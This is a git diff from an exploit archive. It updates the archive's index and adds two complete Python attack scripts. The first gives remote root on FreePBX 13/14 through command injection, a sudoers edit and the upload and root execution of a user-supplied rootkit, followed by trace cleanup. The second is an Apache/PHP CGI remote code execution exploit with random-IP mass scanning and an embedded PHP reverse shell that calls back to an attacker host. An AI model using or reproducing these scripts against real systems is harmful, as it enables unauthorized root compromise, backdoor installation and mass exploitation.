+39694,platforms/windows/local/39694.txt,"Microsoft Office Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0 39695,platforms/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80 39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80 @@ -36373,7 +36373,7 @@ id,file,description,date,author,platform,type,port 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple CSRF",2016-08-10,hyp3rlinx,php,webapps,80 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 -40224,platforms/windows/dos/40224.txt,"Microsoft Office Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,"Sébastien Morin",windows,dos,0 +40224,platforms/windows/local/40224.txt,"Microsoft Office Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,"Sébastien Morin",windows,local,0 40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 @@ -36381,3 +36381,6 @@ id,file,description,date,author,platform,type,port 40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0 40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0 40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80 +40232,platforms/linux/webapps/40232.py,"FreePBX 13 / 14 - Remote Code Execution",2016-08-12,pgt,linux,webapps,0 +40233,platforms/php/remote/40233.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2)",2013-11-01,noptrix,php,remote,0 +40234,platforms/windows/remote/40234.py,"Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 diff --git a/platforms/linux/webapps/40232.py b/platforms/linux/webapps/40232.py new file mode 100755 index 000000000..0f40a50b1 --- /dev/null +++ b/platforms/linux/webapps/40232.py @@ -0,0 +1,470 @@ +#!/usr/bin/env python +# -*- coding, latin-1 -*- ###################################################### +# # +# DESCRIPTION # +# FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net # +# # +# AUTHOR # +# pgt - nullsecurity.net # +# # +# DATE # +# 8-12-2016 # +# # +# VERSION # +# freepbx0day.py 0.1 # +# # +# AFFECTED VERSIONS # +# FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26) # +# # +# STATUS # +# Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908 # +# # +# TESTED AGAINST # +# * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso # +# * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso # +# # +# TODO # +# * SSL support (priv8) # +# * parameter for TCP port # +# # +# HINT # +# Base64 Badchars: '+', '/', '=' # +# # +################################################################################ + +''' +Successful exploitation should looks like: + +[*] enum FreePBX version +[+] target running FreePBX 13 +[*] checking if target is vulnerable +[+] target seems to be vulnerable +[*] getting kernel version +[!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 .... +[+] Linux x86_64 platform +[*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine +[*] triggering incrond to gaining root permissions via sudo +[*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD! +[*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine +[*] checking if we gained root permissions +[!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root) +[+] adding view.php to admin/.htaccess +[*] creating upload script: admin/libraries/view.php +[*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php +[*] removing view.php from admin/.htaccess +[*] rm -f admin/libraries/view.php +[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23 +[*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers +[*] removing all temp files +[!] have fun and HACK THE PLANET! +''' + + +import base64 +import httplib +import optparse +import re +from socket import * +import sys +import time + + +BANNER = '''\033[0;31m +################################################################################ +#___________ ________________________ ___ ____________ # +#\_ _____/______ ____ ____\______ \______ \ \/ / /_ \_____ \ # +# | __) \_ __ \_/ __ \_/ __ \| ___/| | _/\ / | | _(__ < # +# | \ | | \/\ ___/\ ___/| | | | \/ \ | |/ \ # +# \___ / |__| \___ >\___ >____| |______ /___/\ \ |___/______ / # +# \/ \/ \/ \/ \_/ \/ # +# _______ .___ # +# \ _ \ __| _/____ ___.__. * Remote Root 0-Day # +# / /_\ \ ______ / __ |\__ \< | | # +# \ \_/ \ /_____/ / /_/ | / __ \ \___ | # +# \_____ / \____ |(____ / ____| # +# \/ \/ \/\/ # +# # +# * Remote Command Execution Exploit (FreePBX 14 is affected also) # +# * Local Root Exploit (probably FreePBX 14 is also exploitable) # +# * Backdoor Upload + Execute As Root # +# # +# * Author: pgt - nullsecurity.net # +# * Version: 0.1 # +# # +################################################################################ +\033[0;m''' + + +def argspage(): + parser = optparse.OptionParser() + + parser.add_option('-u', default=False, metavar='', + help='ip/url to exploit') + parser.add_option('-r', default=False, metavar='', + help='Linux 32bit bd/rootkit') + parser.add_option('-R', default=False, metavar='', + help='Linux 64bit bd/rootkit') + parser.add_option('-a', default='/', metavar='', + help='FreePBX path - default: \'/\'') + + args, args2 = parser.parse_args() + + if (args.u == False) or (args.r == False) or (args.R == False): + print '' + parser.print_help() + print '\n' + exit(0) + + return args + + +def cleanup_fe(): + print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ + '\' from freepbx_engine' + cmd = 'sed -i -- \' /echo \"asterisk ALL=(ALL) NOPASSWD\:ALL\">>' \ + '\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine' + command_execution(cmd) + + return + + +def cleanup_lr(): + print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ + '\' from launch-restapps' + cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \ + 'modules/restapps/launch-restapps.sh' + command_execution(cmd) + + return + + +def cleanup_htaccess(): + print '[*] removing view.php from admin/.htaccess' + cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \ + 'config\\\\.php|ajax\\\\.php/g\' .htaccess' + command_execution(cmd) + + return + + +def cleanup_view_php(): + print '[*] rm -f admin/libraries/view.php' + cmd = 'rm -f libraries/view.php' + command_execution(cmd) + + return + + +def cleanup_sudoers(): + print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers' + cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL) NOPASSWD:ALL/d\' /etc/sudoers' + command_execution(cmd) + + return + + +def cleanup_tmpfiles(): + print '[*] removing all temp files' + cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null' + command_execution(cmd) + + return + + +def check_platform(response): + if (response.find('Linux') != -1) and (response.find('x86_64') != -1): + print '[+] Linux x86_64 platform' + return '64' + elif (response.find('Linux') != -1) and (response.find('i686') != -1): + print '[+] Linux i686 platform' + cleanup_tmpfiles() + sys.exit(1) + return '32' + else: + print '[-] adjust check_platform() when you want to backdoor ' \ + 'other platforms' + cleanup_tmpfiles() + sys.exit(1) + + +def check_kernel(response): + if response.find('w00t') != -1: + start = response.find('w00t') + 4 + end = response.find('w00tw00t') - 1 + print '[!] Kernel: %s' % (response[start:end].replace('\\', '')) + + return check_platform(response[start:end]) + + +def check_root(response): + if response.find('uid=0(root)') != -1: + start = response.find('w00t') + 4 + end = response.find('w00tw00t') - 2 + print '[!] w00tw00t w3 r r00t - %s' % (response[start:end]) + return + else: + print '[-] we are not root :(' + cleanup_fe() + cleanup_lr() + cleanup_tmpfiles() + sys.exit(1) + + +def build_request(filename): + body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \ + '&command=convert&module=recordings' % (filename) + content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + + return content_type, body + + +def filter_filename(response): + start = response.find('localfilename":"w00t') + 16 + end = response.find('.wav') + 4 + + return response[start:end] + + +def post(path, content_type, body): + h = httplib.HTTP(ARGS.u) + h.putrequest('POST', '%s%s' % (ARGS.a, path)) + h.putheader('Host' , '%s' % (ARGS.u)) + h.putheader('Referer' , 'http://%s/' % (ARGS.u)) + h.putheader('Content-Type', content_type) + h.putheader('Content-Length', str(len(body))) + h.endheaders() + h.send(body) + errcode, errmsg, headers = h.getreply() + + return h.file.read() + + +def encode_multipart_formdata(fields, filename=None): + LIMIT = '----------lImIt_of_THE_fIle_eW_$' + CRLF = '\r\n' + L = [] + L.append('--' + LIMIT) + if fields: + for (key, value) in fields.items(): + L.append('Content-Disposition: form-data; name="%s"' % key) + L.append('') + L.append(value) + L.append('--' + LIMIT) + + if filename == None: + L.append('Content-Disposition: form-data; name="file"; filename="dasd"') + L.append('Content-Type: audio/mpeg') + L.append('') + L.append('da') + else: + L.append('Content-Disposition: form-data; name="file"; filename="dasd"') + L.append('Content-Type: application/octet-stream') + L.append('') + L.append(open_file(filename)) + + L.append('--' + LIMIT + '--') + L.append('') + body = CRLF.join(L) + content_type = 'multipart/form-data; boundary=%s' % (LIMIT) + + return content_type, body + + +def create_fields(payload): + fields = {'id': '1', 'name': 'aaaa', 'extension': '0', 'language': 'ru', + 'systemrecording': '', 'filename': 'w00t%s' % (payload)} + + return fields + + +def command_execution(cmd): + upload_path = 'admin/ajax.php?module=recordings&command=' \ + 'savebrowserrecording' + cmd = base64.b64encode(cmd) + payload = '`echo %s | base64 -d | sh`' % (cmd) + fields = create_fields(payload) + content_type, body = encode_multipart_formdata(fields) + response = post(upload_path, content_type, body) + filename = filter_filename(response) + content_type, body = build_request(filename) + + return post('admin/ajax.php', content_type, body) + + +def check_vuln(): + h = httplib.HTTP(ARGS.u) + h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a)) + h.putheader('Host' , '%s' % (ARGS.u)) + h.endheaders() + errcode, errmsg, headers = h.getreply() + response = h.file.read() + + if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1: + print '[-] target seems not to be vulnerable' + sys.exit(1) + + upload_path = 'admin/ajax.php?module=recordings&command' \ + '=savebrowserrecording' + payload = 'w00tw00t' + fields = create_fields(payload) + content_type, body = encode_multipart_formdata(fields) + response = post(upload_path, content_type, body) + + if response.find('localfilename":"w00tw00tw00t') != -1: + print '[+] target seems to be vulnerable' + return + else: + print '[-] target seems not to be vulnerable' + sys.exit(1) + + +def open_file(filename): + try: + f = open(filename, 'rb') + file_content = f.read() + f.close() + return file_content + except IOError: + print '[-] %s does not exists!' % (filename) + sys.exit(1) + + +def version13(): + print '[*] checking if target is vulnerable' + check_vuln() + + print '[*] getting kernel version' + cmd = 'uname -a; echo w00tw00t' + response = command_execution(cmd) + result = check_kernel(response) + if result == '64': + backdoor = ARGS.R + elif result == '32': + backdoor = ARGS.r + + print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \ + 'to freepbx_engine' + cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\ ' \ + 'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \ + 'asterisk/bin/freepbx_engine' + command_execution(cmd) + + + print '[*] triggering incrond to gaining root permissions via sudo' + cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart' + command_execution(cmd) + + print '[*] waiting 20 seconds while incrond restarts applications' \ + ' - /_!_\\ VERY LOUD!' + time.sleep(20) + + cleanup_fe() + #cleanup_lr() + + print '[*] checking if we gained root permissions' + cmd = 'sudo -n id; echo w00tw00t' + response = command_execution(cmd) + check_root(response) + + print '[+] adding view.php to admin/.htaccess' + cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \ + 'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess' + command_execution(cmd) + + print '[*] creating upload script: admin/libraries/view.php' + cmd = 'echo \'\' > libraries/view.php' + command_execution(cmd) + + print '[*] uploading %s to /tmp/23 via ' \ + 'admin/libraries/view.php' % (backdoor) + content_type, body = encode_multipart_formdata(False, backdoor) + post('admin/libraries/view.php', content_type, body) + + cleanup_htaccess() + cleanup_view_php() + + print '[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \ + ' rm -f /tmp/23' + cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23' + setdefaulttimeout(5) + try: + command_execution(cmd) + except timeout: + ''' l4zY w0rk ''' + + setdefaulttimeout(20) + try: + cleanup_sudoers() + cleanup_tmpfiles() + except timeout: + cleanup_tmpfiles() + + return + + +def enum_version(): + h = httplib.HTTP(ARGS.u) + h.putrequest('GET', '%sadmin/config.php' % (ARGS.a)) + h.putheader('Host' , '%s' % (ARGS.u)) + h.endheaders() + errcode, errmsg, headers = h.getreply() + response = h.file.read() + + if response.find('FreePBX 13') != -1: + print '[+] target running FreePBX 13' + return 13 + else: + print '[-] target is not running FreePBX 13' + + return False + + +def checktarget(): + if re.match(r'^[0-9.\-]*$', ARGS.u): + target = ARGS.u + else: + try: + target = gethostbyname(ARGS.u) + except gaierror: + print '[-] \'%s\' is unreachable' % (ARGS.u) + + sock = socket(AF_INET, SOCK_STREAM) + sock.settimeout(5) + result = sock.connect_ex((target, 80)) + sock.close() + if result != 0: + '[-] \'%s\' is unreachable' % (ARGS.u) + sys.exit(1) + + return + +def main(): + print BANNER + + checktarget() + + open_file(ARGS.r) + open_file(ARGS.R) + + print '[*] enum FreePBX version' + result = enum_version() + + if result == 13: + version13() + + print '[!] have fun and HACK THE PLANET!' + + return + + +if __name__ == '__main__': + ARGS = argspage() + try: + main() + except KeyboardInterrupt: + print '\nbye bye!!!' + time.sleep(0.01) + sys.exit(1) + +#EOF \ No newline at end of file diff --git a/platforms/php/remote/40233.py b/platforms/php/remote/40233.py new file mode 100755 index 000000000..51483d662 --- /dev/null +++ b/platforms/php/remote/40233.py @@ -0,0 +1,398 @@ +#!/usr/bin/env python +# +# ap-unlock-v1337.py - apache + php 5.* rem0te c0de execution exploit +# +# NOTE: +# - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :((( +# - for connect back shell start netcat/nc and bind port on given host:port +# - is ip-range scanner not is multithreaded, but iz multithreaded iz in +# random scanner and is scanner from file (greets to MustLive) +# - more php paths can be added +# - adjust this shit for windows b0xes +# +# 2013 +# by noptrix - http://nullsecurity.net/ + +import sys, socket, argparse, threading, time, random, select, ssl + + +NONE = 0 +VULN = 1 +SCMD = 2 +XPLT = 3 + +t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \ + '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \ + '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \ + '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\ + '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\ + 'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n' + + +def m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt): + c0nn_b4ck = \ + ''' + array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w")); + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port");while (1) { + if (feof($sock)) {printit("ERROR: Shell connection terminated");break;} + if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;} + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input");fwrite($sock, $input);} + if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock); + fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process); + function printit ($string) {if (!$daemon) {print "$string\n";}}?> + ''' + return c0nn_b4ck + + +def enc0dez(): + n33dz1 = ('cgi-bin', 'php') + n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d', + 'suhosin.simulation=on', '-d', 'disable_functions=""', '-d', + 'open_basedir=none', '-d', 'auto_prepend_file=php://input', + '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0', + '-d', 'auto_prepend_file=php://input', '-n') + fl4g = 0 + arg5 = '' + p4th = '' + plus = '' + + for x in n33dz2: + if fl4g == 1: + plus = '+' + arg5 = arg5 + plus + \ + ''.join('%' + c.encode('utf-8').encode('hex') for c in x) + fl4g = 1 + for x in n33dz1: + p4th = p4th + '/' + \ + ''.join('%' + c.encode('utf-8').encode('hex') for c in x) + return (p4th, arg5) + + +def m4k3_p4yl0rd(p4yl0rd, m0de): + p4th, arg5 = enc0dez() + if m0de == VULN: + p4yl0rd = t3st + elif m0de == SCMD or m0de == XPLT: + p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \ + 'Host: ' + sys.argv[1] + '\r\n' \ + 'Content-Type: application/x-www-form-urlencoded\r\n' \ + 'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd + return p4yl0rd + + +def s3nd_sh1t_ss1(args, m0de, c0nn_b4ck): + pat = ('Parse error:', 'Warning:') + s = d0_c0nn3ct(args) + try: + ss = socket.ssl(s) + except: + print "-> n0 w3bs3rv3r 0n %s" % (args.h) + return + if m0de == VULN: + p4yl0rd = m4k3_p4yl0rd('', m0de) + ss.write(p4yl0rd) + try: + d4t4 = ss.read(8192) + except: + return + for p in pat: + if p in d4t4: + print "-> " + args.h + " vu1n" + return args.h + else: + if args.v: + print "-> %s n0t vu1n" % (args.h) + return + elif m0de == SCMD: + p4yl0rd = m4k3_p4yl0rd('', m0de) + ss.write(p4yl0rd) + rd, wd, ex = select.select([s], [], [], float(args.T)) + if rd: + for l1n3 in ss.read(): + sys.stdout.write(l1n3) + elif m0de == XPLT: + p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de) + ss.write(p4yl0rd) + else: + if args.v: + print "-> n0 w3bs3rv3r 0n %s" % (args.h) + return + + +def s3nd_sh1t(args, m0de, c0nn_b4ck): + pat = ('Parse error:', 'Warning:') + s = d0_c0nn3ct(args) + if s: + if m0de == VULN: + p4yl0rd = m4k3_p4yl0rd('', m0de) + s.sendall(p4yl0rd) + try: + d4t4 = s.recv(8192) + except: + return + for p in pat: + try: + if p in d4t4: + print "-> " + args.h + " vu1n" + if args.f: + wr1te_fil3(args) + return args.h + else: + if args.v: + print "-> %s n0t vu1n" % (args.h) + return + except: + return + elif m0de == SCMD: + p4yl0rd = m4k3_p4yl0rd('', m0de) + s.sendall(p4yl0rd) + rd, wd, ex = select.select([s], [], [], float(args.T)) + if rd: + try: + for l1n3 in s.makefile(): + print l1n3, + except: + return + elif m0de == XPLT: + p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de) + s.sendall(p4yl0rd) + else: + if args.v: + print "-> c0uld n0t c0nn3ct t0 %s" % (args.h) + return + + +def d0_c0nn3ct(args): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(float(args.t)) + res = s.connect_ex((args.h, int(args.p))) + if res == 0: + return s + except socket.error: + return + return + + +def m4k3_r4nd_1p4ddr(num): + h0sts = [] + for x in range(int(num)): + h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255), + random.randrange(0,255), random.randrange(0,255), + random.randrange(0,255))) + return h0sts + + +def d0_sc4n(args, h0st, m0de, vu1nz, rsa, rsb): + args.h = h0st.rstrip() + if args.S: + s3nd_sh1t_ss1(args, m0de, None) + else: + s3nd_sh1t(args, m0de, None) + return + + +def sc4n_r4ng3(args, m0de, rsa, rsb): + vu1nz = [] + for i in range (rsa[0], rsb[0]): + for j in range (rsa[1], rsb[1]): + for k in range (rsa[2], rsb[2]): + for l in range(rsa[3], rsb[3]): + args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l) + if args.S: + s3nd_sh1t_ss1(args, m0de, None) + else: + s3nd_sh1t(args, m0de, None) + return + + +def m4k3_ipv4_r4ng3(iprange): + a = tuple(part for part in iprange.split('.')) + rsa = (range(4)) + rsb = (range(4)) + for i in range(0,4): + ga = a[i].find('-') + if ga != -1: + rsa[i] = int(a[i][:ga]) + rsb[i] = int(a[i][1+ga:]) + 1 + else: + rsa[i] = int(a[i]) + rsb[i] = int(a[i]) + 1 + return (rsa, rsb) + + +def parse_args(): + p = argparse.ArgumentParser( + usage='\n\n ./ap-unlock-v1337.py -h <4rg> -s | -c <4rg> | -x <4rg> ' \ + '[0pt1ons]\n ./ap-unlock-v1337.py -r <4rg> | -R <4rg> | -i <4rg>'\ + ' [0pt1ons]', + formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False) + opts = p.add_argument_group('0pt1ons', '') + opts.add_argument('-h', metavar='wh1t3h4tz.0rg', + help='| t3st s1ngle h0st f0r vu1n') + opts.add_argument('-p', default=80, metavar='80', + help='| t4rg3t p0rt (d3fau1t: 80)') + opts.add_argument('-S', action='store_true', + help='| c0nn3ct thr0ugh ss1') + opts.add_argument('-c', metavar='\'uname -a;id\'', + help='| s3nd c0mm4nds t0 h0st') + opts.add_argument('-x', metavar='192.168.0.2:1337', + help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll') + opts.add_argument('-s', action='store_true', + help='| t3st s1ngl3 h0st f0r vu1n') + opts.add_argument('-r', metavar='133.1.3-7.7-37', + help='| sc4nz iP addr3ss r4ng3 f0r vu1n') + opts.add_argument('-R', metavar='1337', + help='| sc4nz num r4nd0m h0st5 f0r vu1n') + opts.add_argument('-t', default=2, metavar='2', + help='| c0nn3ct t1me0ut in s3x (d3fau1t: 3)') + opts.add_argument('-T', default=2, metavar='2', + help='| r3ad t1me0ut in s3x (d3fau1t: 3)') + opts.add_argument('-f', metavar='vu1n.lst', + help='| wr1t3 vu1n h0sts t0 f1l3') + opts.add_argument('-i', metavar='sc4nz.lst', + help='| sc4nz h0sts fr0m f1le f0r vu1n') + opts.add_argument('-v', action='store_true', + help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng') + args = p.parse_args() + if not args.h and not args.r and not args.R and not args.i: + p.print_help() + sys.exit(0) + return args + + +def wr1te_fil3(args): + try: + f = open(args.f, "a+") + f.write(args.h + "\n") + f.close() + except: + sys.stderr.write('[-] 3rr0r: de1n3 mudd1 k0cht guT') + sys.stderr.write('\n') + raise SystemExit() + return + + +def run_threads(args, h0sts, m0de, vu1nz, rsa, rsb): + num_h0sts = len(h0sts) + num = 0 + try: + if args.r: + sc4n_r4ng3(args, m0de, rsa, rsb) + else: + for h0st in h0sts: + num += 1 + if args.v: + sys.stdout.flush() + sys.stdout.write("[" + str(num) + "/" + str(num_h0sts) + + "] ") + else: + sys.stdout.flush() + sys.stdout.write("\r[+] h0sts sc4nn3d: " + str(num) + + "/" + str(num_h0sts) + " \b") + t = threading.Thread(target=d0_sc4n, args=(args, h0st, m0de, + vu1nz, None, None)) + t.start() + t.join() + except KeyboardInterrupt: + sys.stdout.flush() + sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n") + raise SystemExit + return + + +def c0ntr0ller(): + vu1nz = [] + m0de = NONE + try: + args = parse_args() + if args.h: + if args.s: + print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h) + m0de = VULN + if args.S: + s3nd_sh1t_ss1(args, m0de, None) + else: + s3nd_sh1t(args, m0de, None) + elif args.c: + print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h) + m0de = SCMD + if args.S: + s3nd_sh1t_ss1(args, m0de, None) + else: + s3nd_sh1t(args, m0de, None) + elif args.x: + print "[+] xpl0it1ng b0x %s " % (args.h) + m0de = XPLT + if args.x.find(':') != -1: + if not args.x.split(':')[1]: + print "[-] 3rr0r: p0rt m1ss1ng" + else: + cb_h0st = args.x.split(':')[0] + cb_p0rt = args.x.split(':')[1] + else: + print "[-] 3rr0r: : y0u l4m3r" + c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt) + if args.S: + s3nd_sh1t_ss1(args, m0de, c0nn_b4ck) + else: + s3nd_sh1t(args, m0de, c0nn_b4ck) + else: + print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch" + sys.exit(-1) + if args.r: + print "[+] sc4nn1ng r4ng3 %s " % (args.r) + m0de = VULN + rsa, rsb = m4k3_ipv4_r4ng3(args.r) + run_threads(args, None, m0de, None, rsa, rsb) + if args.R: + print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R)) + m0de = VULN + h0sts = m4k3_r4nd_1p4ddr(int(args.R)) + run_threads(args, h0sts, m0de, vu1nz, None, None) + if args.i: + print "[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i) + m0de = VULN + h0sts = tuple(open(args.i, 'r')) + run_threads(args, h0sts, m0de, vu1nz, None, None) + except KeyboardInterrupt: + sys.stdout.flush() + sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n") + raise SystemExit + return + + +def m41n(): + if __name__ == "__main__": + print "--==[ ap-unlock-v1337.py by noptrix@nullsecurity.net ]==--" + c0ntr0ller() + else: + print "[-] 3rr0r: y0u fuck3d up dud3" + sys.exit(1) + print "[+] h0p3 1t h3lp3d" + + +# \o/ fr33 requiem 1337 h4x0rs ... +m41n() + +# e0F \ No newline at end of file diff --git a/platforms/windows/dos/39694.txt b/platforms/windows/local/39694.txt similarity index 100% rename from platforms/windows/dos/39694.txt rename to platforms/windows/local/39694.txt diff --git a/platforms/windows/dos/40224.txt b/platforms/windows/local/40224.txt similarity index 100% rename from platforms/windows/dos/40224.txt rename to platforms/windows/local/40224.txt diff --git a/platforms/windows/remote/18354.py b/platforms/windows/remote/18354.py index 49889abd1..0332320e1 100755 --- a/platforms/windows/remote/18354.py +++ b/platforms/windows/remote/18354.py @@ -1,4 +1,24 @@ -#!/usr/bin/python +#!/usr/bin/env python +# -*- coding: latin-1 -*- # #################################################### +# ____ _ __ # +# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # +# / _ \/ // / / (_-